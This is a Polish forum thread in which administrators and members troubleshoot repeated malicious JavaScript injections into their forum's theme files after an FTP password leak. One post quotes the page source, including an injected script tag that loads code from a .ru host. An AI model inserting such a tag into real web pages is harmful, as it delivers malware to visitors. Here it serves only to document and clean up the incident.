Autor Wątek: mroczne ruskie wirusy w javascripcie  (Przeczytany 5303 razy)

Offline Keiran

  • Naczelny Ekonom
  • DKMiści
  • +++++
  • Wiadomości: 7 951
mroczne ruskie wirusy w javascripcie
« dnia: 2010-07-15 (Czw), 14:43 »
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.

Offline pedro

  • DKMiści
  • +++++
  • Wiadomości: 4 154
mroczne ruskie wirusy w javascripcie
« Odpowiedź #1 dnia: 2010-07-15 (Czw), 15:36 »
Widzę na NoScriptcie właśnie.

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
mroczne ruskie wirusy w javascripcie
« Odpowiedź #2 dnia: 2010-07-16 (Pią), 13:37 »
Hm, wczoraj Diabellus mi mówił ale myślałem, że znów jakiś fejk alert.
Zaktualizowałem forum do najnowszej wersji bo mieliśmy starą, może jakieś exploity były. Sah powywalał śmieci też jakieś z plików.
Dajcie znać jak się nadal będzie waliło.
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
mroczne ruskie wirusy w javascripcie
« Odpowiedź #3 dnia: 2010-07-16 (Pią), 15:19 »
nikt tu nie pisze nic, więc wiadomo.

z drugiej strony pamiętam już tyle renesansów aktywności...
Tak się teraz przekonuję - w internecie same chuje

Offline B

  • Lis Niebieski
  • Moderator Globalny
  • ++++
  • Wiadomości: 3 705
  • control over men is all
mroczne ruskie wirusy w javascripcie
« Odpowiedź #4 dnia: 2010-07-16 (Pią), 16:26 »
No mnie opera przez parę dni nie wpuszczała tutaj w ogóle, krzycząc że wirusy itd, dzisiaj widzę ruszyło, sah nazi mod pokonał wirusa!
"więc lis postanowił go wyruchać"

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
mroczne ruskie wirusy w javascripcie
« Odpowiedź #5 dnia: 2010-07-16 (Pią), 16:58 »
to może od razu do smf do 2.0 zrobić?

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
mroczne ruskie wirusy w javascripcie
« Odpowiedź #6 dnia: 2010-07-29 (Czw), 08:19 »
WIRUSY!!!!!!!!11111111
JS/TrojanDownloader.HackLoad.AA

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
mroczne ruskie wirusy w javascripcie
« Odpowiedź #7 dnia: 2010-07-29 (Czw), 08:22 »
!!!!!11
Tak się teraz przekonuję - w internecie same chuje

Offline Diabellus

  • DKMiści
  • ++
  • Wiadomości: 1 821
mroczne ruskie wirusy w javascripcie
« Odpowiedź #8 dnia: 2010-07-29 (Czw), 08:31 »
No ale da się wejść tym razem przynajmniej.
I chuj.

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
mroczne ruskie wirusy w javascripcie
« Odpowiedź #9 dnia: 2010-07-29 (Czw), 08:37 »
Hm, szczerze mówiąc mam kłopot. Nie bardzo przychodzi mi do głowy skąd one mogą się pojawiać. Ktoś musi gdzieś kod wstrzykiwać, damn... ;(
Ale nie wiem którędy.

Ja nie widzę alertów, ale w pracy jestem i używamy nieszczęsnego FSecura. Dajcie mi znać kto widzi alerty i na jakim antywirusie.

PS. Mam nadzieję, że nikt nie używa Internet Explorer'a żeby przeglądać forum...
« Ostatnia zmiana: 2010-07-29 (Czw), 09:07 wysłana przez waste »
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
mroczne ruskie wirusy w javascripcie
« Odpowiedź #10 dnia: 2010-07-29 (Czw), 10:44 »
na bank ktoś używa
Tak się teraz przekonuję - w internecie same chuje

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
mroczne ruskie wirusy w javascripcie
« Odpowiedź #11 dnia: 2010-07-29 (Czw), 10:58 »
No to kiep ten ktoś i powinniśmy go zbanować immediately.
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline pedro

  • DKMiści
  • +++++
  • Wiadomości: 4 154
mroczne ruskie wirusy w javascripcie
« Odpowiedź #12 dnia: 2010-07-29 (Czw), 11:22 »
NoScript blokuje malepad.ru

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
mroczne ruskie wirusy w javascripcie
« Odpowiedź #13 dnia: 2010-07-29 (Czw), 11:26 »
firefox i nod4
wyświetla mi komunikaty o wirusie w themes *.js

Offline Diabellus

  • DKMiści
  • ++
  • Wiadomości: 1 821
mroczne ruskie wirusy w javascripcie
« Odpowiedź #14 dnia: 2010-07-29 (Czw), 11:29 »
firefox + avast,
JS:Illredir-CI [Trj] w pliku http://ppk.it.pl/Themes/default/script.js?fin11.
I chuj.

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
mroczne ruskie wirusy w javascripcie
« Odpowiedź #15 dnia: 2010-07-29 (Czw), 11:38 »
 :anhero:

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
mroczne ruskie wirusy w javascripcie
« Odpowiedź #16 dnia: 2010-07-29 (Czw), 12:21 »
Panowie, ten skrypt ktoś ma ciągle - ktoś z uprawnieniami do logowania itd. i on zmienia pliki FTP forum. Wszyscy musieliby również wyczyścić swoje lokalne komputery, albo musiałbym wszystkim wyłączyć prawa pisania na forum, co się mija z celem.
ADMINISTRATORZY I MODERATORZY BEZWZGLĘDNIE PROSZĘ PRZELECIEĆ SWOJE DYSKI ANTYWIRUSAMI!!!!

Teraz widzę, że wszystki pliki JavaScript w tym katalogu zostały zmienione dnia Jul 28 21:22.
Wszystkie inne pliki mają datę 16 lipca.
« Ostatnia zmiana: 2010-07-29 (Czw), 12:25 wysłana przez waste »
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
mroczne ruskie wirusy w javascripcie
« Odpowiedź #17 dnia: 2010-07-29 (Czw), 14:36 »
może to SABOTAŻ?????????????
Tak się teraz przekonuję - w internecie same chuje

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
mroczne ruskie wirusy w javascripcie
« Odpowiedź #18 dnia: 2010-07-30 (Pią), 10:53 »
a co to jest właściwie ten malepad.ru i co robi? oprócz tego że forum zamiast się ładować to się łączy z tym szitem?
Tak się teraz przekonuję - w internecie same chuje

Offline Keiran

  • Naczelny Ekonom
  • DKMiści
  • +++++
  • Wiadomości: 7 951
mroczne ruskie wirusy w javascripcie
« Odpowiedź #19 dnia: 2010-07-30 (Pią), 13:24 »
waste - to jak to jest? ktos kto ma uprawnienia do logowania moze zmieniac pliki na forum?

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
mroczne ruskie wirusy w javascripcie
« Odpowiedź #20 dnia: 2010-07-30 (Pią), 13:35 »
Do zmiany plików forumowych prawa ma skrypt PHPowy.
Więc jak ktoś ma IE zabugowanego, to może skrypt z jego kompa zadziałać i zmienić pliki na FTP. To przypuszczenie, bo po prawdzie nie wiem jak to się dzieje.
Spróbuję powyłączać uprawnienia tym plikom. Aktualizacje i tak robię ręcznie.
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
mroczne ruskie wirusy w javascripcie
« Odpowiedź #21 dnia: 2010-07-30 (Pią), 18:53 »


tak to jest dzieci jak się bez porządnego firewalla wchodzi na internet

w sumie jakby durny rootkit mi nie wyłączył windows update to bym nie wiedział  że coś jest nie tak

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
mroczne ruskie wirusy w javascripcie
« Odpowiedź #22 dnia: 2010-07-30 (Pią), 19:10 »
Wygląda na to że sytuacja opanowana (tak jak poprzednio). Wyciąłem odnośniki do ruskich skryptów z plików .js w tematach default i phobos. Zmienię sobie hasło na forum. Waste: hasło na ftp też może by warto.

Offline pedro

  • DKMiści
  • +++++
  • Wiadomości: 4 154
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #23 dnia: 2010-07-30 (Pią), 19:24 »
Nadal widzę malepad.ru blokowane na NoScripcie.

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #24 dnia: 2010-07-30 (Pią), 20:01 »
hm... może cookies albo cache?

edit: waste, do czego służy katalog "masakra" na ftp?
« Ostatnia zmiana: 2010-07-30 (Pią), 20:43 wysłana przez sah »

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #25 dnia: 2010-07-30 (Pią), 23:26 »
stare forum, można wywalić
w sensie, że jakaś kopia backupowa testowa

jakby co to łap mnie na google talk (to zwykły jabber jest) bo pieprzone gadu mi sie rozpina co chwilkę, nie chce mi się już tego pilnować.
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #26 dnia: 2010-08-02 (Pon), 21:54 »

Offline

  • +++++
  • Wiadomości: 4 271
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #27 dnia: 2010-08-02 (Pon), 23:18 »

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #28 dnia: 2010-08-02 (Pon), 23:24 »
around piano never relax

po prostu trzeba na firewallu zablokować adres *.ru :roll:

Offline

  • +++++
  • Wiadomości: 4 271
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #29 dnia: 2010-08-02 (Pon), 23:52 »
A rilisy najnowszych płyt to niby skąd się biorą?

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #30 dnia: 2010-08-03 (Wto), 09:44 »
Znaczy że znów??
Damn

Wyłączę wszystkim plikom możliwość zapisu, możliwe, że źle są prawa zapisu ustawione (każdy może).
Część plików musi mieć prawa zapisu przez wszystkich, ale większość nie.

______________________

Poczyściłem - czekam na ewentualne alerty.
« Ostatnia zmiana: 2010-08-03 (Wto), 12:37 wysłana przez waste »
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #31 dnia: 2010-08-03 (Wto), 14:50 »
dzięki!

Offline Kokos

  • Jesteśmy Debilem
  • ++
  • Wiadomości: 1 067
  • Positive!
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #32 dnia: 2010-08-03 (Wto), 16:11 »
Mało tego PPK sta
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.
Mało tego PPK stało się kokoso-dostępne, i jeszcze ta web 2.0 skórka.... taka grafitowo, szklana... może logo appla jeszcze wstawcie?

Boże odkąd dostałem bana moje życie było tak bogate w doznania codziennego życia...

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #33 dnia: 2010-08-03 (Wto), 16:47 »
Kokos!
Tak się teraz przekonuję - w internecie same chuje

Offline Durbik

  • DKMiści
  • +++++
  • Wiadomości: 7 454
  • Obey the Fist!
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #34 dnia: 2010-08-13 (Pią), 11:12 »
pocketbloke.ru! to tam wysyłamy nasze żadania tym razem?
Tak się teraz przekonuję - w internecie same chuje

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #35 dnia: 2010-08-13 (Pią), 11:21 »
:wilq_zly1:
Poddaję się, nie mam dostępu do logów serwera ;(
Spróbuję pogadać z adminem

edit:
Zmieniłem hasło do ftp, wieczorem usunę jeszcze raz wszystkie odwołania do skryptów bo nie mam czasu teraz.
Mam potwierdzenie, że w jakiś sposób wyciekło hasło do naszego FTPa. Pliki były ładowane notorycznie, także poprzednie moje naprawienie niewiele zmieniło. (sah miał rację!)
« Ostatnia zmiana: 2010-08-13 (Pią), 17:31 wysłana przez waste »
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Greybrow

  • DKMiści
  • ++
  • Wiadomości: 1 138
  • no way
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #36 dnia: 2010-08-13 (Pią), 23:09 »
Ostrzeżenie: Odwiedzenie tej witryny może spowodować uszkodzenie komputera.
Witryna pod adresem ppk.it.pl zawiera elementy pochodzące z witryny riotassistance.ru prawdopodobnie zawierającej złośliwe oprogramowanie, które może zaszkodzić komputerowi lub w inny sposób działać bez zgody użytkownika. Samo odwiedzenie witryny zawierającej złośliwe oprogramowanie może spowodować zainfekowanie komputera.
</div>
<div id="ajax_in_progress" style="display: none;">Ładowanie...</div>
</body></html><script type="text/javascript" src="http://riotassistance.ru/CD-ROM.js"></script>
<!--0df1965351a6f0c952cb31d00e7c1fc8-->

Offline sah

  • Administrator
  • ++++
  • Wiadomości: 3 834
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #37 dnia: 2010-08-14 (Sob), 10:21 »
Pocieszę Cię waste że hasło musiało wyciec ode mnie, przez tego rootkita. Z tego co wiem są trojany które wykradają hasła ftp.

Co nie zmienia faktu, że dobrze jest usłyszeć "sah miał rację".

Offline waste

  • Magister Cieć
  • Administrator
  • ++++
  • Wiadomości: 3 430
  • <tu wpisz jakiś mroczny tekst>
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #38 dnia: 2010-08-15 (Nie), 07:52 »
Pliki poprawiłem, powinno być OK. Sprawdziłbym to wcześniej, ale to bardzo proste konto - nie mam dostępu do logów.
W międzyczasie trafiliśmy na jakiś blacklist więc się nie zdziwcie jak się okaże, że przeglądarka pokaże wam środkowy palec twierdząc, że strona jest niebezpieczna.
Anyway - powinno być ok i proszę natychmiast o info jeśli coś się wydarzy.
(Sah jak będziesz potrzebował hasło, daj znać)

edit:
Wystąpiłem do Google z prośbą o usunięcie z blacklisty, ale to pewnie trochę potrwa.
« Ostatnia zmiana: 2010-08-15 (Nie), 08:33 wysłana przez waste »
waste / marti.presents.pl / proud member of SPPUF! / Zakon Entombedian walczy!

Offline Crask

  • ++
  • Wiadomości: 1 599
  • Papapishu
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #39 dnia: 2010-08-27 (Pią), 23:49 »
Mało tego PPK sta
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.
Mało tego PPK stało się kokoso-dostępne, i jeszcze ta web 2.0 skórka.... taka grafitowo, szklana... może logo appla jeszcze wstawcie?

Boże odkąd dostałem bana moje życie było tak bogate w doznania codziennego życia...

Zastanawia mnie jedno. Jak kokos doszedł do tego, że już nie jest na PPK zbanowany ? Nie sądzę żeby do userów wysyłano wiadomości "you are unbanned", więc ciekaw jestem jak odkrył coś takiego. Przychodził sprawdzać ?
"Obvious with hindsight !"

Offline KaGieBe

  • +++
  • Wiadomości: 2 707
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #40 dnia: 2010-08-28 (Sob), 08:19 »
Może śledził jakiś wątek i po długiej przerwie przyszło mu powiadomienie?
Zlo i krew... i smalec tez (nie wylaczajac entropii).


Offline Kokos

  • Jesteśmy Debilem
  • ++
  • Wiadomości: 1 067
  • Positive!
Odp: mroczne ruskie wirusy w javascripcie
« Odpowiedź #41 dnia: 2013-06-04 (Wto), 10:31 »
Może śledził jakiś wątek i po długiej przerwie przyszło mu powiadomienie?
Tak BTW. Albo ktoś był złośliwy i tak serwer ustawił (bardziej prawdopodobne), albo jest jakiś błąd na forum (mniej prawdopodobne).

Anyway.. efekt jest taki, że od kilku ładnych już lat dostaję ostro przemnożone powiadomienia na swój inbox (dziś tylko: 61 + 32 = 93 powiadomienia). :-) Niby mnie to nie boli, bo dla gmaila to pryszcz, ale gdyby ktoś wiedział o co biega i mógłby to poprawić - byłby to całkiem miły gest. :)



Pzdr,
K